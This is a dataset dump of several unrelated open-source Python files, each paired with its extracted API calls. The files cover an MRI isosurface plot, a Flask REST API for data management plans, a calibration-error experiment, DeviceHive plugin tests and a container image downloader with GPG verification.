code (strings, 22 to 1.05M chars) | apis (lists, 1 to 3.31k items) | extract_api (strings, 75 to 3.25M chars)
---|---|---|
#!/usr/bin/env python
# Example taken from:
# http://www.mathworks.com/access/helpdesk/help/techdoc/visualize/f5-3371.html
from scitools.easyviz import *
from time import sleep
from scipy import io
setp(interactive=False)
# Displaying an Isosurface:
mri = io.loadmat('mri_matlab_v6.mat')
D = mri['D']
#Ds = smooth3(D);
isosurface(D,5,indexing='xy')
#hiso = isosurface(Ds,5),
# 'FaceColor',[1,.75,.65],...
# 'EdgeColor','none');
shading('interp')
# Adding an Isocap to Show a Cutaway Surface:
#hcap = patch(isocaps(D,5),...
# 'FaceColor','interp',...
# 'EdgeColor','none');
#colormap(map)
# Define the View:
view(45,30)
axis('tight')
daspect([1,1,.4])
# Add Lighting:
#lightangle(45,30);
#set(gcf,'Renderer','zbuffer'); lighting phong
#isonormals(Ds,hiso)
#set(hcap,'AmbientStrength',.6)
#set(hiso,'SpecularColorReflectance',0,'SpecularExponent',50)
show()
raw_input('Press Return key to quit: ')
#savefig('tmp_isosurf2a.eps')
#savefig('tmp_isosurf2a.png')
| [
"scipy.io.loadmat"
]
| [((260, 291), 'scipy.io.loadmat', 'io.loadmat', (['"""mri_matlab_v6.mat"""'], {}), "('mri_matlab_v6.mat')\n", (270, 291), False, 'from scipy import io\n')] |
"""Blueprint definitions for maDMP integration."""
from flask import Blueprint, jsonify, request
from invenio_db import db
from .convert import convert_dmp
from .models import DataManagementPlan
def _summarize_dmp(dmp: DataManagementPlan) -> dict:
"""Create a summary dictionary for the given DMP."""
res = {"dmp_id": dmp.dmp_id, "datasets": []}
for ds in dmp.datasets:
dataset = {"dataset_id": ds.dataset_id, "record": None}
if ds.record:
dataset["record"] = ds.record.model.json
res["datasets"].append(dataset)
return res
def create_rest_blueprint(app) -> Blueprint:
"""Create the blueprint for the REST endpoints using the current app extensions."""
# note: using flask.current_app isn't directly possible, because Invenio-MaDMP is
# registered as an extension in the API app, not the "normal" app
# (which is the one usually returned by current_app)
rest_blueprint = Blueprint("invenio_madmp", __name__)
auth = app.extensions["invenio-madmp"].auth
@rest_blueprint.route("/dmps", methods=["GET"])
@auth.login_required
def list_dmps():
"""Give a summary of all stored DMPs."""
dmps = DataManagementPlan.query.all()
res = [_summarize_dmp(dmp) for dmp in dmps]
return jsonify(res)
@rest_blueprint.route("/dmps", methods=["POST"])
@auth.login_required
def create_dmp():
"""Create a new DMP from the maDMP JSON in the request body."""
if request.json is None:
return jsonify({"error": "no json body supplied"}), 400
elif request.json.get("dmp") is None:
return jsonify({"error": "dmp not found in the body"}), 400
dmp_json = request.json.get("dmp", {})
dmp_json_id = dmp_json.get("dmp_id", {}).get("identifier")
if DataManagementPlan.get_by_dmp_id(dmp_json_id) is not None:
return jsonify({"error": "dmp with the same id already exists"}), 409
dmp = convert_dmp(dmp_json)
db.session.add(dmp)
db.session.commit()
# TODO change the returned value
return jsonify(_summarize_dmp(dmp)), 201
@rest_blueprint.route("/dmps/<dmp_id>", methods=["PATCH"])
@auth.login_required
def update_dmp(dmp_id: str = None):
"""Update the specified DMP using the maDMP JSON in the request body."""
hard_sync = request.args.get("sync", "soft") == "hard"
if request.json is None:
return jsonify({"error": "no json body supplied"}), 400
elif request.json.get("dmp") is None:
return jsonify({"error": "dmp not found in the body"}), 400
dmp_json = request.json.get("dmp", {})
dmp_json_id = dmp_json.get("dmp_id", {}).get("identifier")
if dmp_id and dmp_json_id and dmp_id != dmp_json_id:
return jsonify({"error": "mismatch between dmp id from url and body"}), 400
dmp_id = dmp_id or dmp_json_id
if DataManagementPlan.get_by_dmp_id(dmp_id) is None:
return jsonify({"error": "dmp not found"}), 404
dmp = convert_dmp(dmp_json, hard_sync)
db.session.commit()
# TODO change the returned value
return jsonify(_summarize_dmp(dmp))
@rest_blueprint.route("/dmps", methods=["PATCH"])
@auth.login_required
def update_dmp_without_id():
"""Update the specified DMP using the maDMP JSON in the request body."""
return update_dmp(None)
return rest_blueprint
| [
"flask.request.args.get",
"invenio_db.db.session.commit",
"invenio_db.db.session.add",
"flask.request.json.get",
"flask.Blueprint",
"flask.jsonify"
]
| [((965, 1001), 'flask.Blueprint', 'Blueprint', (['"""invenio_madmp"""', '__name__'], {}), "('invenio_madmp', __name__)\n", (974, 1001), False, 'from flask import Blueprint, jsonify, request\n'), ((1312, 1324), 'flask.jsonify', 'jsonify', (['res'], {}), '(res)\n', (1319, 1324), False, 'from flask import Blueprint, jsonify, request\n'), ((1737, 1764), 'flask.request.json.get', 'request.json.get', (['"""dmp"""', '{}'], {}), "('dmp', {})\n", (1753, 1764), False, 'from flask import Blueprint, jsonify, request\n'), ((2030, 2049), 'invenio_db.db.session.add', 'db.session.add', (['dmp'], {}), '(dmp)\n', (2044, 2049), False, 'from invenio_db import db\n'), ((2058, 2077), 'invenio_db.db.session.commit', 'db.session.commit', ([], {}), '()\n', (2075, 2077), False, 'from invenio_db import db\n'), ((2682, 2709), 'flask.request.json.get', 'request.json.get', (['"""dmp"""', '{}'], {}), "('dmp', {})\n", (2698, 2709), False, 'from flask import Blueprint, jsonify, request\n'), ((3144, 3163), 'invenio_db.db.session.commit', 'db.session.commit', ([], {}), '()\n', (3161, 3163), False, 'from invenio_db import db\n'), ((2399, 2431), 'flask.request.args.get', 'request.args.get', (['"""sync"""', '"""soft"""'], {}), "('sync', 'soft')\n", (2415, 2431), False, 'from flask import Blueprint, jsonify, request\n'), ((1550, 1593), 'flask.jsonify', 'jsonify', (["{'error': 'no json body supplied'}"], {}), "({'error': 'no json body supplied'})\n", (1557, 1593), False, 'from flask import Blueprint, jsonify, request\n'), ((1612, 1635), 'flask.request.json.get', 'request.json.get', (['"""dmp"""'], {}), "('dmp')\n", (1628, 1635), False, 'from flask import Blueprint, jsonify, request\n'), ((1922, 1979), 'flask.jsonify', 'jsonify', (["{'error': 'dmp with the same id already exists'}"], {}), "({'error': 'dmp with the same id already exists'})\n", (1929, 1979), False, 'from flask import Blueprint, jsonify, request\n'), ((2495, 2538), 'flask.jsonify', 'jsonify', (["{'error': 'no json body supplied'}"], {}), "({'error': 'no json body supplied'})\n", (2502, 2538), False, 'from flask import Blueprint, jsonify, request\n'), ((2557, 2580), 'flask.request.json.get', 'request.json.get', (['"""dmp"""'], {}), "('dmp')\n", (2573, 2580), False, 'from flask import Blueprint, jsonify, request\n'), ((2858, 2921), 'flask.jsonify', 'jsonify', (["{'error': 'mismatch between dmp id from url and body'}"], {}), "({'error': 'mismatch between dmp id from url and body'})\n", (2865, 2921), False, 'from flask import Blueprint, jsonify, request\n'), ((3047, 3082), 'flask.jsonify', 'jsonify', (["{'error': 'dmp not found'}"], {}), "({'error': 'dmp not found'})\n", (3054, 3082), False, 'from flask import Blueprint, jsonify, request\n'), ((1664, 1711), 'flask.jsonify', 'jsonify', (["{'error': 'dmp not found in the body'}"], {}), "({'error': 'dmp not found in the body'})\n", (1671, 1711), False, 'from flask import Blueprint, jsonify, request\n'), ((2609, 2656), 'flask.jsonify', 'jsonify', (["{'error': 'dmp not found in the body'}"], {}), "({'error': 'dmp not found in the body'})\n", (2616, 2656), False, 'from flask import Blueprint, jsonify, request\n')] |
import sys
sys.path = ['', '..'] + sys.path[1:]
import daemon
from assistance_bot import core
from functionality.voice_processing import speaking, listening
from functionality.commands import *
if __name__ == '__main__':
speaking.setup_assistant_voice(core.ttsEngine, core.assistant)
while True:
# start speech recording and speech recognition
recognized_speech = listening.get_listening_and_recognition_result(
core.recognizer,
core.microphone)
# executing the given command
execute_command(recognized_speech)
| [
"functionality.voice_processing.listening.get_listening_and_recognition_result",
"functionality.voice_processing.speaking.setup_assistant_voice"
]
| [((229, 291), 'functionality.voice_processing.speaking.setup_assistant_voice', 'speaking.setup_assistant_voice', (['core.ttsEngine', 'core.assistant'], {}), '(core.ttsEngine, core.assistant)\n', (259, 291), False, 'from functionality.voice_processing import speaking, listening\n'), ((392, 477), 'functionality.voice_processing.listening.get_listening_and_recognition_result', 'listening.get_listening_and_recognition_result', (['core.recognizer', 'core.microphone'], {}), '(core.recognizer, core.microphone\n )\n', (438, 477), False, 'from functionality.voice_processing import speaking, listening\n')] |
import argparse
import multiprocessing
import os
import random
import numpy as np
from data_utils import DATAFILE_LIST, DATASET_LIST, prepare_data, RESULTS_DIR
from models import SumOfBetaEce
random.seed(2020)
num_cores = multiprocessing.cpu_count()
NUM_BINS = 10
NUM_RUNS = 100
N_list = [100, 200, 500, 1000, 2000, 5000, 10000]
OUTPUT_DIR = RESULTS_DIR + "bayesian_reliability_comparison/"
def main(args) -> None:
# load data
categories, observations, confidences, idx2category, category2idx, labels = prepare_data(
DATAFILE_LIST[args.dataset], False)
# train a ground_truth ece model
if args.ground_truth_type == 'bayesian':
ground_truth_model = SumOfBetaEce(num_bins=args.num_bins, pseudocount=args.pseudocount)
else:
ground_truth_model = SumOfBetaEce(num_bins=args.num_bins, pseudocount=1e-3)
ground_truth_model.update_batch(confidences, observations)
results = np.zeros((args.num_runs, len(N_list), 5))
for run_id in range(args.num_runs):
tmp = list(zip(confidences, observations))
random.shuffle(tmp)
confidences, observations = zip(*tmp)
model = SumOfBetaEce(num_bins=args.num_bins, pseudocount=args.pseudocount)
for i in range(len(N_list)):
tmp = 0 if i == 0 else N_list[i - 1]
model.update_batch(confidences[tmp: N_list[i]], observations[tmp: N_list[i]])
results[run_id, i, 0] = N_list[i]
results[run_id, i, 1] = model.eval
results[run_id, i, 2] = model.frequentist_eval
results[run_id, i, 3] = model.calibration_estimation_error(ground_truth_model, args.weight_type)
results[run_id, i, 4] = model.frequentist_calibration_estimation_error(ground_truth_model, args.weight_type)
results_mean = np.mean(results, axis=0)
results_variance = np.std(results, axis=0)
# OUTPUT_DIR is a module-level constant; without the global declaration the
# augmented assignment below would make it a local and raise UnboundLocalError.
global OUTPUT_DIR
if args.weight_type == 'online':
OUTPUT_DIR += "online_weights/"
try:
os.stat(OUTPUT_DIR)
except OSError:
os.mkdir(OUTPUT_DIR)
if args.ground_truth_type == 'frequentist':
filename_mean = OUTPUT_DIR + "frequentist_ground_truth_%s_pseudocount%d.csv" % (args.dataset, args.pseudocount)
filename_std = OUTPUT_DIR + "frequentist_ground_truth_%s_pseudocount%d_std.csv" % (
args.dataset, args.pseudocount)
else:
filename_mean = OUTPUT_DIR + "bayesian_ground_truth_%s_pseudocount%d.csv" % (args.dataset, args.pseudocount)
filename_std = OUTPUT_DIR + "bayesian_ground_truth_%s_pseudocount%d_std.csv" % (
args.dataset, args.pseudocount)
header = 'N, bayesian_ece, frequentist_ece, bayesian_estimation_error, frequentist_estimation_error'
np.savetxt(filename_mean, results_mean, delimiter=',', header=header)
np.savetxt(filename_std, results_variance, delimiter=',', header=header)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('dataset', type=str, default='cifar100', help='input dataset')
parser.add_argument('-pseudocount', type=int, default=1, help='strength of prior')
parser.add_argument('-ground_truth_type', type=str, default='bayesian',
help='compute ground truth in a Bayesian or frequentist way, bayesian or frequentist')
parser.add_argument('-weight_type', type=str, default='pool',
help='weigh each bin with all data or only data seen so far, online or pool')
parser.add_argument('--num_runs', type=int, default=NUM_RUNS, help='number of runs')
parser.add_argument('--num_bins', type=int, default=NUM_BINS, help='number of bins in reliability diagram')
args, _ = parser.parse_known_args()
if args.dataset not in DATASET_LIST:
raise ValueError("%s is not in DATASET_LIST." % args.dataset)
main(args)
| [
"data_utils.prepare_data",
"numpy.mean",
"random.shuffle",
"argparse.ArgumentParser",
"multiprocessing.cpu_count",
"random.seed",
"os.mkdir",
"numpy.savetxt",
"numpy.std",
"os.stat",
"models.SumOfBetaEce"
]
| [((195, 212), 'random.seed', 'random.seed', (['(2020)'], {}), '(2020)\n', (206, 212), False, 'import random\n'), ((225, 252), 'multiprocessing.cpu_count', 'multiprocessing.cpu_count', ([], {}), '()\n', (250, 252), False, 'import multiprocessing\n'), ((517, 565), 'data_utils.prepare_data', 'prepare_data', (['DATAFILE_LIST[args.dataset]', '(False)'], {}), '(DATAFILE_LIST[args.dataset], False)\n', (529, 565), False, 'from data_utils import DATAFILE_LIST, DATASET_LIST, prepare_data, RESULTS_DIR\n'), ((1798, 1822), 'numpy.mean', 'np.mean', (['results'], {'axis': '(0)'}), '(results, axis=0)\n', (1805, 1822), True, 'import numpy as np\n'), ((1846, 1869), 'numpy.std', 'np.std', (['results'], {'axis': '(0)'}), '(results, axis=0)\n', (1852, 1869), True, 'import numpy as np\n'), ((2701, 2770), 'numpy.savetxt', 'np.savetxt', (['filename_mean', 'results_mean'], {'delimiter': '""","""', 'header': 'header'}), "(filename_mean, results_mean, delimiter=',', header=header)\n", (2711, 2770), True, 'import numpy as np\n'), ((2775, 2847), 'numpy.savetxt', 'np.savetxt', (['filename_std', 'results_variance'], {'delimiter': '""","""', 'header': 'header'}), "(filename_std, results_variance, delimiter=',', header=header)\n", (2785, 2847), True, 'import numpy as np\n'), ((2891, 2916), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (2914, 2916), False, 'import argparse\n'), ((686, 752), 'models.SumOfBetaEce', 'SumOfBetaEce', ([], {'num_bins': 'args.num_bins', 'pseudocount': 'args.pseudocount'}), '(num_bins=args.num_bins, pseudocount=args.pseudocount)\n', (698, 752), False, 'from models import SumOfBetaEce\n'), ((792, 847), 'models.SumOfBetaEce', 'SumOfBetaEce', ([], {'num_bins': 'args.num_bins', 'pseudocount': '(0.001)'}), '(num_bins=args.num_bins, pseudocount=0.001)\n', (804, 847), False, 'from models import SumOfBetaEce\n'), ((1068, 1087), 'random.shuffle', 'random.shuffle', (['tmp'], {}), '(tmp)\n', (1082, 1087), False, 'import random\n'), ((1151, 1217), 'models.SumOfBetaEce', 'SumOfBetaEce', ([], {'num_bins': 'args.num_bins', 'pseudocount': 'args.pseudocount'}), '(num_bins=args.num_bins, pseudocount=args.pseudocount)\n', (1163, 1217), False, 'from models import SumOfBetaEce\n'), ((1965, 1984), 'os.stat', 'os.stat', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (1972, 1984), False, 'import os\n'), ((2005, 2025), 'os.mkdir', 'os.mkdir', (['OUTPUT_DIR'], {}), '(OUTPUT_DIR)\n', (2013, 2025), False, 'import os\n')] |
from sigvisa.learn.train_coda_models import get_shape_training_data
import numpy as np
X, y, evids = get_shape_training_data(runid=4, site="AS12", chan="SHZ", band="freq_2.0_3.0", phases=["P",], target="amp_transfer", max_acost=np.float("inf"), min_amp=-2)
np.savetxt("X.txt", X)
np.savetxt("y.txt", y)
np.savetxt("evids.txt", evids)
| [
"numpy.float",
"numpy.savetxt"
]
| [((258, 280), 'numpy.savetxt', 'np.savetxt', (['"""X.txt"""', 'X'], {}), "('X.txt', X)\n", (268, 280), True, 'import numpy as np\n'), ((281, 303), 'numpy.savetxt', 'np.savetxt', (['"""y.txt"""', 'y'], {}), "('y.txt', y)\n", (291, 303), True, 'import numpy as np\n'), ((304, 334), 'numpy.savetxt', 'np.savetxt', (['"""evids.txt"""', 'evids'], {}), "('evids.txt', evids)\n", (314, 334), True, 'import numpy as np\n'), ((229, 244), 'numpy.float', 'np.float', (['"""inf"""'], {}), "('inf')\n", (237, 244), True, 'import numpy as np\n')] |
from ad9833 import AD9833
# DUMMY classes for testing without board
class SBI(object):
def __init__(self):
pass
def send(self, data):
print(data)
class Pin(object):
def __init__(self):
pass
def low(self):
print(" 0")
def high(self):
print(" 1")
# Code
SBI1 = SBI()
PIN3 = Pin()
wave = AD9833(SBI1, PIN3)
wave.set_freq(14500)
wave.set_type(2)
wave.send()
print(wave.shape_type)
| [
"ad9833.AD9833"
]
| [((387, 405), 'ad9833.AD9833', 'AD9833', (['SBI1', 'PIN3'], {}), '(SBI1, PIN3)\n', (393, 405), False, 'from ad9833 import AD9833\n')] |
# Copyright (C) 2018 DataArt
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# =============================================================================
from six.moves import range
def test_subscribe_events(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-e', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-e', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
command_name = '%s-command' % device_id
notification_name = '%s-notification' % device_id
return {'device': device,
'network': network,
'command_name': command_name,
'notification_name': notification_name}
def send_data(device, command_name, notification_name):
command = device.send_command(command_name)
command.status = 'status'
command.save()
notification = device.send_notification(notification_name)
return command.id, command.id, notification.id
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/insert', command_insert_id),
('command/update', command_update_id),
('notification/insert', notification_id)]
def handle_event(handler, event):
action_id_pair = (event.action, event.data.id)
assert action_id_pair in handler.data['event_ids']
handler.data['event_ids'].remove(action_id_pair)
if handler.data['event_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id])
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/insert', command_insert_id),
('command/update', command_update_id)]
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_notifications=False)
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/insert', command_insert_id),
('notification/insert', notification_id)]
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_update_commands=False)
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
event_ids = send_data(handler.data['device'],
handler.data['command_name'],
handler.data['notification_name'])
command_insert_id, command_update_id, notification_id = event_ids
handler.data['event_ids'] = [('command/update', command_update_id),
('notification/insert', notification_id)]
data = init_data()
name = test.generate_id('n-s-e', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_insert_commands=False)
test.run(plugin, handle_connect, handle_event, data=data)
plugin_api.remove_plugin(plugin['topicName'])
def test_subscribe_insert_commands(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-i-c', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-i-c', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
command_names = ['%s-name-%s' % (device_id, i) for i in range(2)]
return {'device': device,
'network': network,
'command_names': command_names}
def send_data(device, command_names):
return [device.send_command(name).id for name in command_names]
def handle_connect(handler):
handler.data['command_ids'] = send_data(handler.data['device'],
handler.data['command_names'])
def handle_command_insert(handler, command):
assert command.id in handler.data['command_ids']
handler.data['command_ids'].remove(command.id)
if handler.data['command_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-i-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_update_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_insert=handle_command_insert, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
handler.data['command_ids'] = send_data(
handler.data['device'], handler.data['command_names'])[-1:]
data = init_data()
name = test.generate_id('n-s-i-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
names=data['command_names'][-1:],
subscribe_update_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_insert=handle_command_insert, data=data)
plugin_api.remove_plugin(plugin['topicName'])
def test_subscribe_update_commands(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-u-c', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-u-c', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
command_names = ['%s-name-%s' % (device_id, i) for i in range(2)]
return {'device': device,
'network': network,
'command_names': command_names}
def send_data(device, command_names):
command_ids = []
for name in command_names:
command = device.send_command(name)
command.status = 'status'
command.save()
command_ids.append(command.id)
return command_ids
def handle_connect(handler):
handler.data['command_ids'] = send_data(handler.data['device'],
handler.data['command_names'])
def handle_command_update(handler, command):
assert command.id in handler.data['command_ids']
assert command.status == 'status'
handler.data['command_ids'].remove(command.id)
if handler.data['command_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-u-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_insert_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_update=handle_command_update, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
handler.data['command_ids'] = send_data(
handler.data['device'], handler.data['command_names'])[-1:]
data = init_data()
name = test.generate_id('n-s-u-c', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
names=data['command_names'][-1:],
subscribe_insert_commands=False,
subscribe_notifications=False)
test.run(plugin, handle_connect,
handle_command_update=handle_command_update, data=data)
plugin_api.remove_plugin(plugin['topicName'])
def test_subscribe_notifications(test):
test.only_admin_implementation()
plugin_api = test.plugin_api()
device_hive_api = test.device_hive_api()
def init_data():
net_name = test.generate_id('n-s-n', test.NETWORK_ENTITY)
net_description = '%s-description' % net_name
network = device_hive_api.create_network(net_name, net_description)
device_id = test.generate_id('n-s-n', test.DEVICE_ENTITY)
device = device_hive_api.put_device(device_id, network_id=network.id)
notification_names = ['%s-name-%s' % (device_id, i) for i in range(2)]
return {'device': device,
'network': network,
'notification_names': notification_names}
def send_data(device, notification_names):
return [device.send_notification(name).id for name in
notification_names]
def handle_connect(handler):
handler.data['notification_ids'] = send_data(
handler.data['device'], handler.data['notification_names'])
def handle_notification(handler, notification):
assert notification.id in handler.data['notification_ids']
handler.data['notification_ids'].remove(notification.id)
if handler.data['notification_ids']:
return
handler.data['device'].remove()
handler.disconnect()
data = init_data()
name = test.generate_id('n-s-n', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
subscribe_insert_commands=False,
subscribe_update_commands=False)
test.run(plugin, handle_connect,
handle_notification=handle_notification, data=data)
plugin_api.remove_plugin(plugin['topicName'])
# =========================================================================
def handle_connect(handler):
handler.data['notification_ids'] = send_data(
handler.data['device'], handler.data['notification_names'])[-1:]
data = init_data()
name = test.generate_id('n-s-n', test.PLUGIN_ENTITY)
description = '%s-description' % name
plugin = plugin_api.create_plugin(name, description,
network_ids=[data['network'].id],
names=data['notification_names'][-1:],
subscribe_insert_commands=False,
subscribe_update_commands=False)
test.run(plugin, handle_connect,
handle_notification=handle_notification, data=data)
plugin_api.remove_plugin(plugin['topicName'])
| [
"six.moves.range"
]
| [((6449, 6457), 'six.moves.range', 'range', (['(2)'], {}), '(2)\n', (6454, 6457), False, 'from six.moves import range\n'), ((9168, 9176), 'six.moves.range', 'range', (['(2)'], {}), '(2)\n', (9173, 9176), False, 'from six.moves import range\n'), ((12099, 12107), 'six.moves.range', 'range', (['(2)'], {}), '(2)\n', (12104, 12107), False, 'from six.moves import range\n')] |
from __future__ import print_function
import os
import shutil
import hashlib
import requests
import click
from tempfile import NamedTemporaryFile
from hashlib import sha256
from os.path import expanduser, join, exists, basename
from .utils import HumanSize
from .tar import extract_layer
from . import trust
from . import container
from .colorhelper import print_info, print_error, print_warn, print_success
from .colorhelper import success
from .image_index import get_url
from clint.textui import progress
from dateutil.parser import parse as parsedate
from datetime import datetime
CACHE_PATH = join(expanduser("~"), ".pylibcontainer", "images_cache")
class Cache(object):
""" Provides an image caching mechanism on disk """
cache_dir = CACHE_PATH
def __init__(self):
if not exists(CACHE_PATH):
os.makedirs(CACHE_PATH, 0o700)
def get(self, cache_key, default=None):
""" return info for cached file """
cache_hash = sha256(cache_key.encode()).hexdigest()
cache_fn = join(CACHE_PATH, "url_" + cache_hash)
if exists(cache_fn):
file_stat = os.stat(cache_fn)
last_modified = datetime.fromtimestamp(file_stat.st_mtime)
file_size = file_stat.st_size
return cache_fn, cache_hash, last_modified, file_size
return default
def put(self, filename, cache_key):
""" put a file into cache """
cache_hash = sha256(cache_key.encode()).hexdigest()
cache_fn = join(CACHE_PATH, "url_" + cache_hash)
shutil.move(filename, cache_fn)
return cache_hash, cache_fn
def download(image_url):
""" Download image (if not found in cache) and return it's filename """
response = requests.head(image_url)
file_size = remote_file_size = int(response.headers.get("Content-Length"))
remote_last_modified = parsedate(response.headers.get("Last-Modified")).replace(
tzinfo=None
)
remote_is_valid = response.status_code == 200 and file_size and remote_last_modified
# Check if image is on cache
cache = Cache()
cached_image = cache.get(image_url)
if cached_image:
if remote_is_valid:
cache_fn, cache_hash, last_modified, file_size = cached_image
if remote_file_size == file_size and remote_last_modified < last_modified:
print_info("Using file from cache", CACHE_PATH)
return cache_hash, cache_fn
print_info("Downloading new remote file because an update was found")
else:
print_warn("Unable to check the status for " + image_url)
print_warn("Assuming local cache is valid")
# honour that assumption: return the cached copy instead of erroring out below
cache_fn, cache_hash, last_modified, file_size = cached_image
return cache_hash, cache_fn
# Not cached, and no valid remote information was found
if not remote_is_valid:
print_error(
"Unable to get file, http_code=%s, size=%s, last_modified=%s"
% (response.status_code, remote_file_size, remote_last_modified)
)
exit(2)
# Dowload image
print_info(
"Downloading image... ",
"{0} [{1:.2S}]".format(basename(image_url), HumanSize(file_size)),
)
remote_sha256 = hashlib.sha256()
response = requests.get(image_url, stream=True)
with NamedTemporaryFile(delete=False) as tmp_file:
for chunk in progress.bar(
response.iter_content(chunk_size=1024), expected_size=(file_size / 1024) + 1
):
if chunk:
remote_sha256.update(chunk)
tmp_file.write(chunk)
tmp_file.flush()
# Verify image integrity
trust_verify = trust.verify(image_url, tmp_file.name, remote_sha256.hexdigest())
if not trust_verify or not trust_verify.valid or not trust_verify.username:
print_error("Integrity/authenticity error - GPG signature mismatch!")
exit(3)
print("{0:>10}: {1}".format("GPG Signer", success(trust_verify.username)))
print("{0:>10}: {1}".format("GPG ID", success(trust_verify.pubkey_fingerprint)))
print("{0:>10}: {1}".format("Creation", success(trust_verify.creation_date)))
return cache.put(tmp_file.name, image_url)
@click.command()
@click.argument("image_url")
@click.option("--as_root", is_flag=True)
@click.option("--overlay", "-o", multiple=True)
@click.argument("command", nargs=-1)
def run(image_url, command, as_root, overlay):
url = get_url(image_url)
image_url = url or image_url
if not image_url:
print_info("No index was found for image", image_url)
exit(5)
is_validate_only = False
if not command:
command = ["/bin/sh"]
image_protocol = image_url.split(":")[0].lower()
if image_protocol in ["http", "https"]:
_, image_fn = download(image_url)
else:
_, image_fn = sha256(image_url).hexdigest(), image_url
rootfs = extract_layer(image_fn)
if len(command) == 1 and command[0] == "-":
is_validate_only = True
print("Validating container setup with the rootfs")
else:
print_info("Executing", " ".join(command))
_, exit_code = container.runc(rootfs, command, as_root, overlay)
if exit_code != 0:
print_error("Last command returned an error")
elif is_validate_only:
print_success("OK")
| [
"os.path.exists",
"click.argument",
"hashlib.sha256",
"datetime.datetime.fromtimestamp",
"os.makedirs",
"shutil.move",
"click.option",
"os.path.join",
"requests.get",
"requests.head",
"os.path.basename",
"tempfile.NamedTemporaryFile",
"os.stat",
"click.command",
"os.path.expanduser"
]
